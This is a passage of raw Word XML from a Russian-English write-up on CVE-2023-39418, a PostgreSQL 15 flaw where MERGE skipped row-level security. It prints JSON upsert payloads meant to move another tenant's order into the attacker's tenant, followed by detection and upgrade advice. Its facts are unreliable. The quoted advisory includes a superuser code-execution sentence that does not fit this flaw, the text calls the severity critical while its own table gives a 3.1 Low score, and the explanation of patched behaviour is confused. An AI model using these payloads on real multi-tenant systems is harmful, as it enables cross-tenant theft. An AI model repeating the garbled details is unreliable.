    <w:p w14:paraId="35BBD035" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHEN MATCHED THEN UPDATE SET ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012F4332" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHEN NOT MATCHED THEN INSERT (id, tenant_id, status, amount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3182A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    VALUES (s.id, s.tenant_id, s.status, s.amount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6DD799" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PG 15.0–15.3 baseline behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F4DDE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ON-condition (`t.id = s.id`)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> требует SELECT на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app.orders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для проверки existing rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F132C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. PG 15.0–15.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>НЕ применял SELECT policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на этот internal scan — атакующий «видит» все orders в БД, не только свои.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27357939" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WHEN NOT MATCHED — INSERT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> применяет INSERT WITH CHECK policy (правильно): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_id = 42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Payload tenant_id=99 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>должен fail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через WITH CHECK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49784863" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Однако</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE-2023-39418 связана не с INSERT WITH CHECK, а с UPDATE/SELECT path. Корректная демонстрация payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267DDF26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POST /orders/upsert (JWT tenant_42)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E67ED5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369C9CE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "id": 555,                ← существующий order tenant_99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313C167F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "tenant_id": 42,          ← пытаемся "украсть" в свой tenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6937D209" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "status": "stolen",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D81A38D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "amount": 0.01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116C0A81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DBA5C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Если order 555 принадлежит tenant_99:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D73452B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t.id = s.id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → MATCHED для row tenant_99 (но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SELECT policy должна был его скрыть!</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A314AED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   WHEN MATCHED THEN UPDATE → выполняется, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UPDATE policy должна была заблокировать</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (USING: tenant_id=42, row tenant_id=99 → не matched в USING).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00144ACE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В PG 15.0–15.3 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ни SELECT policy, ни UPDATE policy не применялись</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в MERGE path → row tenant_99 успешно «угнан» в tenant_42.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2586791C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Альтернативно — если только INSERT не contained проверки против существующих rows другого tenant:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E0EA76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POST /orders/upsert (tenant_42)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F7653" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBB369B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "id": 555,                ← существующий order tenant_99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2A93E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "tenant_id": 42,          ← подменяем tenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2877E1BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "status": "stolen",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B5EE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "amount": 0.01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2713D46D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC928A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В patched PG (15.4+) MATCHED-проверка возвращает «no match» (SELECT policy скрывает row tenant_99) → WHEN NOT MATCHED → INSERT → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WITH CHECK блокирует</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`id` уже существует</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — primary key violation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462933FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Атакующий может (1) изменить tenant ownership чужих orders через MERGE WHEN MATCHED UPDATE, (2) увидеть existence чужих orders через MATCHED-resolution path, (3) подменить чужие orders без detection через cross-tenant write. Severity критична для multi-tenant SaaS, где tenant_id определяет billing/data ownership.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC0F8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAD9F98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t>: MERGE statements на RLS-protected tables — индикатор. Анализ для tenant_id mismatch требует сравнения JWT-context с actually written rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D03800" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Application-side audit: orders с tenant_id, не совпадающим с creator-tenant в audit_log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C01312A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PG version check: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>15.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>15.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>15.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>15.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C7F7F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MERGE был </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>новый statement type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PG 15.0, добавлен в SQL standard relatively recently. Implementation в PostgreSQL пропустила application some RLS policies для MERGE-specific paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067FB0BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Bug description в CVE advisory: *"MERGE failed to enforce UPDATE or SELECT row security policies. By default, this enabled a subquery to read or update otherwise-forbidden table rows. Within a database, an attacker having permission to create non-temporary objects in at least one schema could execute arbitrary code as the bootstrap superuser."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAC3AD8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Технически:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495A57CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   INSERT WITH CHECK — apply correctly (covered by general INSERT path).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E6F32B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   UPDATE USING — bypass для MERGE-internal updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0B8C18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   SELECT USING (для MATCHED-resolution) — bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020A3589" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это означает, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>subquery, выполняемая внутри MERGE для MATCHED-detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, читала </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>все rows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> таблицы — не только те, что matching SELECT policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB480D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные коммиты в PG git (для PG 15.4 release notes): *"Apply ROW LEVEL SECURITY to MERGE source query"* — это и есть фикс CVE-2023-39418.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BEA6AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Защита:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140CEFAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Upgrade на PG 15.4+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или 16.x, который сразу содержит fix). 15.0-15.3 — критичный upgrade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F53757F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Альтернатива (для legacy 15.0-15.3)</w:t>
      </w:r>
      <w:r>
        <w:t>: избегать MERGE для RLS-protected tables; использовать INSERT ... ON CONFLICT DO UPDATE (который работает корректно с RLS даже в 15.0-15.3) или explicit SELECT + IF + INSERT/UPDATE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCF6513" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62655EDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.0, 15.1, 15.2, 15.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (10 месяцев в 2022-2023). Другие major branches (14.x, 16.x+) — нет MERGE до 15, или сразу с фиксом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F56A19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> валидная роль с INSERT/UPDATE/SELECT на RLS-protected table + application использует MERGE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F4402A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MERGE statement на RLS-таблицу + WHEN MATCHED/NOT MATCHED branches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4E4122"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22355BC3"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38257FD5"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1A5D6FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="37B3EDB3"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0E15FD"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6E760E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2023-39418</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="29B8C61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B2B41D"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B465F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.1 (Low, per PostgreSQL Project)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3C643AB4"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9448E2"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BCC87D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
